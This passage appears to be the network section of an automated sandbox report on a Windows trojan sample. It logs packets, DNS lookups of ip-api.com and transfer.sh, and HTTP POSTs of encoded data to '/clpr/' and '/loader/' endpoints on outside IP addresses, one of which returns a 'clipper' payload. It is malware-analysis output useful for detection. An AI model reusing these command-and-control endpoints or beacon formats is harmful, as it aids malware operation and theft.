                            May 14, 2023 04:51:07.378387928 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378411055 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378484964 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378530979 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378545046 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378604889 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378629923 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378705025 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378719091 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378737926 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378767967 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378818989 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378839970 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378894091 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378909111 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.378926039 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.378952980 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379133940 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379163027 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379221916 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379235029 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379265070 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379280090 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379559040 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379585981 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379705906 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379712105 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379726887 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379781961 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379806042 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379827023 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379873037 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379890919 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.379966021 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.379986048 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380147934 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.380162001 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380182981 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380330086 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380362988 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.380366087 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380387068 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380409002 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.380480051 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.380527020 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380548000 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380613089 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.380623102 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.380647898 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.380667925 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.400724888 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.400758028 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.400847912 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.400875092 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.400902033 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.400942087 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.401401997 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401432991 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401607990 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.401613951 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401629925 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401657104 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401681900 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.401704073 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.401712894 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401731014 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.401760101 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.401835918 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401865005 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401916027 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.401922941 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.401964903 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.402101040 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.402148008 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.402163982 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.402172089 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.402194977 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.402244091 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.402251959 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.402271032 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.402327061 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.402338028 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.402390957 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:07.402417898 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.402441025 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:07.441685915 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:08.418219090 CEST49708443192.168.2.3144.76.136.153
                            May 14, 2023 04:51:08.418299913 CEST44349708144.76.136.153192.168.2.3
                            May 14, 2023 04:51:15.817348957 CEST4971080192.168.2.3208.95.112.1
                            May 14, 2023 04:51:15.846571922 CEST8049710208.95.112.1192.168.2.3
                            May 14, 2023 04:51:15.846993923 CEST4971080192.168.2.3208.95.112.1
                            May 14, 2023 04:51:15.851380110 CEST4971080192.168.2.3208.95.112.1
                            May 14, 2023 04:51:15.889153004 CEST8049710208.95.112.1192.168.2.3
                            May 14, 2023 04:51:15.889318943 CEST4971080192.168.2.3208.95.112.1
                            May 14, 2023 04:51:15.943435907 CEST4971180192.168.2.3185.159.130.81
                            May 14, 2023 04:51:19.080379009 CEST4971180192.168.2.3185.159.130.81
                            May 14, 2023 04:51:20.964112043 CEST4970080192.168.2.3185.159.129.168
                            May 14, 2023 04:51:21.025439978 CEST8049700185.159.129.168192.168.2.3
                            May 14, 2023 04:51:25.124927044 CEST4971180192.168.2.3185.159.130.81
                            May 14, 2023 04:51:37.144164085 CEST4971280192.168.2.3185.159.129.168
                            May 14, 2023 04:51:37.206959963 CEST8049712185.159.129.168192.168.2.3
                            May 14, 2023 04:51:37.207097054 CEST4971280192.168.2.3185.159.129.168
                            May 14, 2023 04:51:37.208010912 CEST4971280192.168.2.3185.159.129.168
                            May 14, 2023 04:51:37.270049095 CEST8049712185.159.129.168192.168.2.3
                            May 14, 2023 04:51:37.270178080 CEST8049712185.159.129.168192.168.2.3
                            May 14, 2023 04:51:37.270306110 CEST4971280192.168.2.3185.159.129.168
                            May 14, 2023 04:51:37.292248964 CEST4971380192.168.2.3185.149.146.118
                            May 14, 2023 04:51:37.314754009 CEST8049713185.149.146.118192.168.2.3
                            May 14, 2023 04:51:37.314951897 CEST4971380192.168.2.3185.149.146.118
                            May 14, 2023 04:51:37.319658995 CEST4971380192.168.2.3185.149.146.118
                            May 14, 2023 04:51:37.342288017 CEST8049713185.149.146.118192.168.2.3
                            May 14, 2023 04:51:37.479145050 CEST8049713185.149.146.118192.168.2.3
                            May 14, 2023 04:51:37.479183912 CEST8049713185.149.146.118192.168.2.3
                            May 14, 2023 04:51:37.479301929 CEST4971380192.168.2.3185.149.146.118
                            May 14, 2023 04:51:37.479377985 CEST4971380192.168.2.3185.149.146.118
                            May 14, 2023 04:51:46.287863016 CEST4971080192.168.2.3208.95.112.1
                            May 14, 2023 04:51:46.287978888 CEST4971380192.168.2.3185.149.146.118
                            May 14, 2023 04:51:46.288016081 CEST4971280192.168.2.3185.159.129.168
                            May 14, 2023 04:52:11.359051943 CEST8049707144.76.136.153192.168.2.3
                            May 14, 2023 04:52:11.359196901 CEST4970780192.168.2.3144.76.136.153
                            May 14, 2023 04:52:16.802156925 CEST4971580192.168.2.3185.159.130.81
                            May 14, 2023 04:52:19.943517923 CEST4971580192.168.2.3185.159.130.81
                            May 14, 2023 04:52:25.944065094 CEST4971580192.168.2.3185.159.130.81
                            May 14, 2023 04:52:37.947556973 CEST4971680192.168.2.3185.159.129.168
                            May 14, 2023 04:52:38.010185957 CEST8049716185.159.129.168192.168.2.3
                            May 14, 2023 04:52:38.010314941 CEST4971680192.168.2.3185.159.129.168
                            May 14, 2023 04:52:38.010570049 CEST4971680192.168.2.3185.159.129.168
                            May 14, 2023 04:52:38.072807074 CEST8049716185.159.129.168192.168.2.3
                            May 14, 2023 04:52:38.220010996 CEST8049716185.159.129.168192.168.2.3
                            May 14, 2023 04:52:38.220056057 CEST8049716185.159.129.168192.168.2.3
                            May 14, 2023 04:52:38.220082045 CEST8049716185.159.129.168192.168.2.3
                            May 14, 2023 04:52:38.220141888 CEST4971680192.168.2.3185.159.129.168
                            May 14, 2023 04:52:38.220174074 CEST4971680192.168.2.3185.159.129.168

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            May 14, 2023 04:49:30.708652020 CEST5932453192.168.2.38.8.8.8
                            May 14, 2023 04:49:30.738018036 CEST53593248.8.8.8192.168.2.3
                            May 14, 2023 04:49:52.629153967 CEST5784053192.168.2.38.8.8.8
                            May 14, 2023 04:49:52.649363995 CEST53578408.8.8.8192.168.2.3
                            May 14, 2023 04:50:39.263525963 CEST5238753192.168.2.38.8.8.8
                            May 14, 2023 04:50:39.307296038 CEST53523878.8.8.8192.168.2.3
                            May 14, 2023 04:51:15.782203913 CEST6062553192.168.2.38.8.8.8
                            May 14, 2023 04:51:15.810194969 CEST53606258.8.8.8192.168.2.3

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            May 14, 2023 04:49:30.708652020 CEST192.168.2.38.8.8.80x30e0Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                            May 14, 2023 04:49:52.629153967 CEST192.168.2.38.8.8.80x6ae2Standard query (0)transfer.shA (IP address)IN (0x0001)false
                            May 14, 2023 04:50:39.263525963 CEST192.168.2.38.8.8.80x3184Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                            May 14, 2023 04:51:15.782203913 CEST192.168.2.38.8.8.80x8bStandard query (0)ip-api.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            May 14, 2023 04:49:30.738018036 CEST8.8.8.8192.168.2.30x30e0No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                            May 14, 2023 04:49:52.649363995 CEST8.8.8.8192.168.2.30x6ae2No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)false
                            May 14, 2023 04:50:39.307296038 CEST8.8.8.8192.168.2.30x3184No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                            May 14, 2023 04:51:15.810194969 CEST8.8.8.8192.168.2.30x8bNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • transfer.sh
                            • ip-api.com

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.349702144.76.136.153443C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.349708144.76.136.153443C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            TimestampkBytes transferredDirectionData


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            10192.168.2.349713185.149.146.11880C:\Users\user\AppData\Roaming\MonDisc.exe
                            TimestampkBytes transferredDirectionData
                            May 14, 2023 04:51:37.319658995 CEST3417OUTPUT /clpr/OWUsODMsODQsOWIsOWYsODIsOGEsOTIsNjgsN2Us HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Cat
                            Host: 185.149.146.118
                            Content-Length: 599
                            Cache-Control: no-cache
                            Data Raw: 7b 22 64 61 74 61 22 3a 22 59 57 59 73 59 54 55 73 5a 47 59 73 5a 44 49 73 59 7a 51 73 5a 44 4d 73 59 6a 59 73 59 7a 45 73 5a 47 55 73 4f 47 59 73 4f 47 51 73 4f 44 63 73 4e 54 6b 73 5a 54 45 73 59 7a 49 73 59 57 4d 73 4f 54 63 73 4f 44 67 73 4f 44 55 73 4f 44 55 73 4e 6d 51 73 59 6a 63 73 59 6a 49 73 4f 57 4d 73 4f 44 6b 73 4f 57 51 73 59 57 51 73 59 54 4d 73 59 6a 4d 73 4f 57 49 73 4f 44 67 73 4e 7a 67 73 4f 44 55 73 4e 32 45 73 59 57 59 73 4f 54 63 73 4f 44 6b 73 59 6a 45 73 4e 7a 67 73 59 6a 41 73 59 6a 4d 73 4f 47 49 73 4f 57 45 73 4f 44 67 73 4e 7a 6b 73 59 57 59 73 4f 44 51 73 4f 44 55 73 4e 6d 4d 73 4f 47 4d 73 4e 6a 63 73 59 6a 67 73 59 54 59 73 5a 47 59 73 5a 47 55 73 5a 47 49 73 59 32 45 73 59 32 51 73 5a 54 6b 73 59 54 67 73 59 54 45 73 4f 54 55 73 4f 44 6b 73 4e 6a 63 73 4f 44 49 73 4e 6d 51 73 4f 57 4d 73 5a 44 63 73 59 7a 63 73 5a 44 4d 73 59 6a 59 73 59 6a 55 73 5a 54 49 73 59 6a 4d 73 59 7a 59 73 59 6a 63 73 59 57 51 73 59 54 41 73 59 6d 55 73 59 6a 67 73 4f 54 67 73 59 6d 51 73 59 6d 45 73 4f 54 49 73 4e 6a 67 73 59 54 49 73 59 54 41 73 4f 54 51 73 4f 44 63 73 4f 57 45 73 59 6a 41 73 4f 54 6b 73 4f 57 55 73 4f 54 6b 73 4f 44 63 73 4e 6a 45 73 4f 44 41 73 4e 7a 41 73 4f 57 4d 73 59 7a 55 73 59 7a 4d 73 5a 54 4d 73 59 6a 49 73 5a 57 4d 73 5a 57 4d 73 59 32 49 73 4f 54 45 73 4f 54 59 73 4e 32 49 73 59 54 41 73 59 6a 41 73 59 57 4d 73 59 54 63 73 59 7a 51 73 4e 32 55 73 4f 57 51 73 59 57 4d 73 5a 54 41 73 5a 44 4d 73 5a 44 51 73 59 6a 67 73 59 32 51 73 5a 54 6b 73 5a 44 49 73 4f 54 4d 73 5a 44 6b 73 59 6d 51 73 59 54 41 73 59 6a 45 73 59 6a 4d 73 5a 54 55 73 5a 44 41 73 59 6a 6b 73 59 57 49 73 4f 44 6b 73 5a 57 51 73 5a 57 4d 73 59 7a 45 73 59 7a 51 73 59 6a 67 73 4e 6a 49 73 5a 44 51 73 59 7a 49 73 59 6a 55 73 4f 57 4d 73 59 57 55 73 59 54 6b 3d 22 7d
                            Data Ascii: {"data":"YWYsYTUsZGYsZDIsYzQsZDMsYjYsYzEsZGUsOGYsOGQsODcsNTksZTEsYzIsYWMsOTcsODgsODUsODUsNmQsYjcsYjIsOWMsODksOWQsYWQsYTMsYjMsOWIsODgsNzgsODUsN2EsYWYsOTcsODksYjEsNzgsYjAsYjMsOGIsOWEsODgsNzksYWYsODQsODUsNmMsOGMsNjcsYjgsYTYsZGYsZGUsZGIsY2EsY2QsZTksYTgsYTEsOTUsODksNjcsODIsNmQsOWMsZDcsYzcsZDMsYjYsYjUsZTIsYjMsYzYsYjcsYWQsYTAsYmUsYjgsOTgsYmQsYmEsOTIsNjgsYTIsYTAsOTQsODcsOWEsYjAsOTksOWUsOTksODcsNjEsODAsNzAsOWMsYzUsYzMsZTMsYjIsZWMsZWMsY2IsOTEsOTYsN2IsYTAsYjAsYWMsYTcsYzQsN2UsOWQsYWMsZTAsZDMsZDQsYjgsY2QsZTksZDIsOTMsZDksYmQsYTAsYjEsYjMsZTUsZDAsYjksYWIsODksZWQsZWMsYzEsYzQsYjgsNjIsZDQsYzIsYjUsOWMsYWUsYTk="}
                            May 14, 2023 04:51:37.479145050 CEST3419INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Sun, 14 May 2023 02:51:37 GMT
                            Content-Type: application/json
                            Content-Length: 1814
                            Connection: keep-alive
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vo336Fsl1yxjk0FADqVlY4DaORglEI3KznG6N%2FSk2uuOtKBR2RDKx%2F5jr3Ztb3AFRiaQQzJh1CW51zwb%2BT66hdK9yG3vsmXicC16l9duP6gu392VJBeC4cDvTSwC6%2FdSRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            CF-RAY: 7c6fd7264f4ebb65-FRA
                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                            Data Raw: 7b 22 63 6c 69 70 70 65 72 22 3a 22 59 7a 63 73 4e 57 49 73 5a 44 67 73 5a 47 49 73 59 7a 51 73 59 32 59 73 59 6a 63 73 5a 57 49 73 5a 44 6b 73 59 6a 59 73 59 6a 6b 73 59 6a 6b 73 4f 54 67 73 5a 54 67 73 59 6a 45 73 59 54 67 73 59 54 55 73 4e 6d 51 73 4e 32 49 73 4e 7a 55 73 4e 6a 67 73 4f 57 55 73 4f 47 55 73 4f 44 67 73 59 6a 63 73 5a 47 51 73 5a 57 49 73 5a 47 45 73 5a 47 59 73 5a 47 45 73 59 7a 49 73 4e 54 55 73 4f 44 59 73 4e 54 6b 73 59 54 63 73 4f 47 55 73 4e 7a 51 73 4f 54 41 73 59 6a 51 73 5a 54 41 73 5a 54 6b 73 59 7a 41 73 59 6a 6b 73 4e 7a 55 73 4e 6d 51 73 4f 57 45 73 4e 6d 59 73 4e 7a 41 73 4e 6a 51 73 4e 6d 51 73 4e 6d 51 73 4e 7a 55 73 4e 54 6b 73 5a 44 51 73 5a 54 49 73 59 7a 6b 73 4e 7a 67 73 59 54 49 73 4f 54 63 73 4f 47 51 73 59 32 59 73 59 7a 67 73 4f 44 55 73 59 54 51 73 59 7a 59 73 4f 57 51 73 5a 57 59 73 4f 54 59 73 59 32 51 73 5a 54 51 73 59 6a 55 73 5a 57 55 73 5a 54 51 73 4f 44 63 73 59 6d 45 73 4f 47 49 73 59 57 51 73 5a 54 41 73 59 6d 55 73 59 6a 6b 73 4e 6a 4d 73 59 6d 55 73 59 6d 49 73 59 7a 63 73 59 54 4d 73 5a 47 45 73 5a 54 4d 73 5a 44 41 73 59 6d 45 73 59 32 49 73 5a 57 55 73 5a 47 49 73 5a 54 4d 73 59 7a 6b 73 4f 44 51 73 4f 54 6b 73 4f 44 55 73 59 54 41 73 5a 57 45 73 5a 44 41 73 4f 47 45 73 5a 44 45 73 4e 6a 59 73 59 54 51 73 4f 57 45 73 4e 7a 51 73 59 6a 59 73 59 6a 59 73 4f 57 49 73 4f 57 4d 73 4f 44 63 73 4e 6a 4d 73 4e 54 55 73 59 6d 4d 73 59 6a 45 73 59 6a 59 73 59 54 55 73 5a 44 63 73 59 54 49 73 5a 47 55 73 59 7a 6b 73 5a 47 4d 73 59 54 63 73 59 54 4d 73 5a 44 45 73 5a 44 49 73 4f 44 51 73 59 57 4d 73 59 6a 67 73 59 6a 49 73 5a 44 6b 73 5a 44 4d 73 4f 44 6b 73 5a 44 45 73 59 6d 45 73 5a 47 59 73 5a 6a 49 73 59 7a 4d 73 59 6d 45 73 59 7a 41 73 4f 54 63 73 5a 47 55 73 59 7a 49 73 4e 32 4d 73 4e 6a 4d 73 4e 32 59 73 4e 7a 59 73 59 6a 59 73 4e 6d 45 73 5a 47 55 73 59 54 4d 73 5a 44 49 73 59 6d 51 73 5a 44 67 73 5a 47 51 73 4f 47 51 73 4f 54 6b 73 4f 44 55 73 4e 7a 59 73 4f 54 67 73 59 7a 41 73 59 54 45 73 4f 54 67 73 4f 57 4d 73 4e 7a 51 73 4f 54 41 73 4e 7a 51 73 5a 6a
                            Data Ascii: {"clipper":"YzcsNWIsZDgsZGIsYzQsY2YsYjcsZWIsZDksYjYsYjksYjksOTgsZTgsYjEsYTgsYTUsNmQsN2IsNzUsNjgsOWUsOGUsODgsYjcsZGQsZWIsZGEsZGYsZGEsYzIsNTUsODYsNTksYTcsOGUsNzQsOTAsYjQsZTAsZTksYzAsYjksNzUsNmQsOWEsNmYsNzAsNjQsNmQsNmQsNzUsNTksZDQsZTIsYzksNzgsYTIsOTcsOGQsY2YsYzgsODUsYTQsYzYsOWQsZWYsOTYsY2QsZTQsYjUsZWUsZTQsODcsYmEsOGIsYWQsZTAsYmUsYjksNjMsYmUsYmIsYzcsYTMsZGEsZTMsZDAsYmEsY2IsZWUsZGIsZTMsYzksODQsOTksODUsYTAsZWEsZDAsOGEsZDEsNjYsYTQsOWEsNzQsYjYsYjYsOWIsOWMsODcsNjMsNTUsYmMsYjEsYjYsYTUsZDcsYTIsZGUsYzksZGMsYTcsYTMsZDEsZDIsODQsYWMsYjgsYjIsZDksZDMsODksZDEsYmEsZGYsZjIsYzMsYmEsYzAsOTcsZGUsYzIsN2MsNjMsN2YsNzYsYjYsNmEsZGUsYTMsZDIsYmQsZDgsZGQsOGQsOTksODUsNzYsOTgsYzAsYTEsOTgsOWMsNzQsOTAsNzQsZj
                            May 14, 2023 04:51:37.479183912 CEST3420INData Raw: 41 73 59 6d 49 73 4f 44 67 73 4f 47 45 73 4f 54 59 73 4f 54 51 73 59 57 59 73 4f 47 55 73 59 54 51 73 4e 6d 4d 73 4f 47 55 73 4e 7a 4d 73 4f 47 45 73 4e 7a 6b 73 5a 44 51 73 59 54 51 73 4f 57 51 73 59 6a 6b 73 59 7a 6b 73 59 57 45 73 4f 57 51 73
                            Data Ascii: AsYmIsODgsOGEsOTYsOTQsYWYsOGUsYTQsNmMsOGUsNzMsOGEsNzksZDQsYTQsOWQsYjksYzksYWEsOWQsOWUsOWMsODgsNjcsOTIsNmQsYWQsYzcsOGQsYTYsODksYWMsYmIsODgsOGEsOGMsOTYsYjMsOGYsODQsNTUsNzcsNjEsNzcsYWYsZGYsZTAsODgsOTAsODgsOTksOTgsOWUsODcsODAsNTMsNmUsYTUsZWEsYzUsN


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            11192.168.2.349716185.159.129.16880C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            TimestampkBytes transferredDirectionData
                            May 14, 2023 04:52:38.010570049 CEST3424OUTPUT /loader/OWUsODMsODQsOWIsOWYsODIsOGEsOTIsNjgsN2Us HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Monkey
                            Host: 185.159.129.168
                            Content-Length: 599
                            Cache-Control: no-cache
                            Data Raw: 7b 22 64 61 74 61 22 3a 22 59 6a 67 73 59 54 67 73 5a 44 63 73 59 7a 59 73 59 6a 6b 73 5a 54 41 73 4f 47 51 73 5a 47 4d 73 59 6a 63 73 4f 44 63 73 4f 44 67 73 4f 44 55 73 4e 54 6b 73 5a 54 45 73 59 7a 49 73 59 57 4d 73 4f 54 63 73 4f 44 67 73 4f 44 55 73 4f 44 55 73 4e 6d 51 73 59 6a 63 73 59 6a 49 73 4f 57 4d 73 4f 44 6b 73 4f 57 51 73 59 57 51 73 59 54 4d 73 59 6a 4d 73 4f 57 49 73 4f 44 67 73 4e 7a 67 73 4f 44 55 73 4e 32 45 73 59 57 59 73 4f 54 63 73 4f 44 6b 73 59 6a 45 73 4e 7a 67 73 59 6a 41 73 59 6a 4d 73 4f 47 49 73 4f 57 45 73 4f 44 67 73 4e 7a 6b 73 59 57 59 73 4f 44 51 73 4f 44 55 73 4e 6d 4d 73 4f 47 4d 73 4e 6a 63 73 59 6a 67 73 59 54 59 73 5a 47 59 73 5a 47 55 73 5a 47 49 73 59 32 45 73 59 32 51 73 5a 54 6b 73 59 54 67 73 59 54 45 73 4f 54 55 73 4f 44 6b 73 4e 6a 63 73 4f 44 49 73 4e 6d 51 73 4f 57 4d 73 5a 44 63 73 59 7a 63 73 5a 44 4d 73 59 6a 59 73 59 6a 55 73 5a 54 49 73 59 6a 4d 73 59 7a 59 73 59 6a 63 73 59 57 51 73 59 54 41 73 59 6d 55 73 59 6a 67 73 4f 54 67 73 59 6d 51 73 59 6d 45 73 4f 54 49 73 4e 6a 67 73 59 54 49 73 59 54 41 73 4f 54 51 73 4f 44 63 73 4f 57 45 73 59 6a 41 73 4f 54 6b 73 4f 57 55 73 4f 54 6b 73 4f 44 63 73 4e 6a 45 73 4f 44 41 73 4e 7a 41 73 4f 57 4d 73 59 7a 55 73 59 7a 4d 73 5a 54 4d 73 59 6a 49 73 5a 57 4d 73 5a 57 4d 73 59 32 49 73 4f 54 45 73 4f 54 59 73 4e 32 49 73 59 54 41 73 59 6a 41 73 59 57 4d 73 59 54 63 73 59 7a 51 73 4e 32 55 73 4f 57 51 73 59 57 4d 73 5a 54 41 73 5a 44 4d 73 5a 44 51 73 59 6a 67 73 59 32 51 73 5a 54 6b 73 5a 44 49 73 4f 54 4d 73 5a 44 6b 73 59 6d 51 73 59 54 41 73 59 6a 45 73 59 6a 4d 73 5a 54 55 73 5a 44 41 73 59 6a 6b 73 59 57 49 73 4f 44 6b 73 5a 57 51 73 5a 57 4d 73 59 7a 45 73 59 7a 51 73 59 6a 67 73 4e 6a 49 73 5a 44 51 73 59 7a 49 73 59 6a 55 73 4f 57 4d 73 59 57 55 73 59 54 6b 3d 22 7d
                            Data Ascii: {"data":"YjgsYTgsZDcsYzYsYjksZTAsOGQsZGMsYjcsODcsODgsODUsNTksZTEsYzIsYWMsOTcsODgsODUsODUsNmQsYjcsYjIsOWMsODksOWQsYWQsYTMsYjMsOWIsODgsNzgsODUsN2EsYWYsOTcsODksYjEsNzgsYjAsYjMsOGIsOWEsODgsNzksYWYsODQsODUsNmMsOGMsNjcsYjgsYTYsZGYsZGUsZGIsY2EsY2QsZTksYTgsYTEsOTUsODksNjcsODIsNmQsOWMsZDcsYzcsZDMsYjYsYjUsZTIsYjMsYzYsYjcsYWQsYTAsYmUsYjgsOTgsYmQsYmEsOTIsNjgsYTIsYTAsOTQsODcsOWEsYjAsOTksOWUsOTksODcsNjEsODAsNzAsOWMsYzUsYzMsZTMsYjIsZWMsZWMsY2IsOTEsOTYsN2IsYTAsYjAsYWMsYTcsYzQsN2UsOWQsYWMsZTAsZDMsZDQsYjgsY2QsZTksZDIsOTMsZDksYmQsYTAsYjEsYjMsZTUsZDAsYjksYWIsODksZWQsZWMsYzEsYzQsYjgsNjIsZDQsYzIsYjUsOWMsYWUsYTk="}
                            May 14, 2023 04:52:38.220010996 CEST3425INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Sun, 14 May 2023 02:52:38 GMT
                            Content-Type: application/json
                            Content-Length: 2336
                            Connection: keep-alive
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qPb0Cnm9IjvO4%2B9lBrYKkHCBwZgvS6EgqPum8avxoVJQwSIzI1wpoRelI5WLYQrAOvp3SvEqaWNy%2FcIGfNjmNB0lPo5DjkYFT7BYmCIPGGswDy%2BrQR7W5dIS1EO0y79pmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            CF-RAY: 7c6fd8a1de44d922-HEL
                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
